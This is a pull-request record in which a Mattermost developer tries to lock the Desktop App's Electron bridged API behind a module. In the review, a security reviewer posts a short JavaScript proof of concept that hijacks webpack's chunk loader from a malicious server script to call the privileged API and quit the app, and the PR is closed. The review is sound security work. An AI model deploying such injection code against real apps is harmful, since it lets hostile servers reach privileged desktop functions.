### PR TITLE
[MM-47711] Encapsulate the bridged API so that it can only be accessed by the Desktop App's own scripts

### PR DESCRIPTION
**Pull request by devinbinnie**
#### Summary
One potential security concern is the case where an attacker could potentially spoof or provide malicious code posing as a Mattermost application that could potentially gain access to Electron main process functionality, that could involve injecting a malicious payload (for example, using the `UPDATE_CONFIGURATION` hook).

This PR aims to encapsulate access to these hooks via a module. The module will make a call to pull the hooks into itself, and then set a flag on the main process to disallow any further attempts to gain access to those hooks. Then the only source of those hooks should be the module, which should only be importable via scripts packaged with the Desktop App.

I'm not sure if this is an infallible solution, so I'm adding security review on this as well and setting it as draft for the time being so that we can get some input on if there's any better solutions, or if there's any additional attack vectors we should be worried about for this particular scope.

#### Ticket Link
https://mattermost.atlassian.net/browse/MM-47711

```release-note
NONE
```

### CODE REVIEW

File: src/main/windows/windowManager.ts [hunk 1]
```diff
@@ -96,8 +100,17 @@ export class WindowManager {
...
         ipcMain.on(CALLS_WIDGET_CHANNEL_LINK_CLICK, this.handleCallsWidgetChannelLinkClick);
+        ipcMain.handle(GET_DESKTOP_APP_API, this.handleGetApi);
     }
 
+    private handleGetApi = (event: IpcMainInvokeEvent) => {
+        if (this.hasAPIById.includes(event.sender.id)) {
+            return false;
+        }
+        this.hasAPIById.push(event.sender.id);
+        return true;
```
[the remark this answers is not in the document]
Comment (devinbinnie) [reply src/main/windows/windowManager.ts:111]: It shouldn't be no, that parameter is generated by the IPC layer, not provided by the front-end. It's just the id of the `webContents` object so we can identify which process it came from.

**Comment by jupenur** [comment]
This is clever, but clever isn't always good 😅 On the surface, the code looks ok and seems to guarantee a pretty reasonable level of isolation. But you have to remember that this all gets compiled by webpack, and webpack wasn't designed to uphold any of those guarantees.

Here's a piece of black magic that, when included in a malicious server's `remote_entry.js`, successfully invokes `getAPI().quit()` after the app has been running for 10 seconds:

```javascript
let push = window.webpackChunkmattermost_desktop.push
window.webpackChunkmattermost_desktop.push = function (a) {
        a[1] = a[1].map(b => {
                return (module, exports, require) => {
                        setTimeout(_ => {
                                require(6).setAPI().then(_ => require(6).getAPI().quit());
                        }, 10000);
                        return b(module, exports, require);
                };
        })
        push.call(this, a);
}
```

**Review by m1lt0n — COMMENTED** [review]
Great job! I don't have any particular comments on this from a security standpoint.

**Comment by devinbinnie** [comment]
Closing this for now as I try to figure out a way that will be more secure.

**Pull request closed without merging**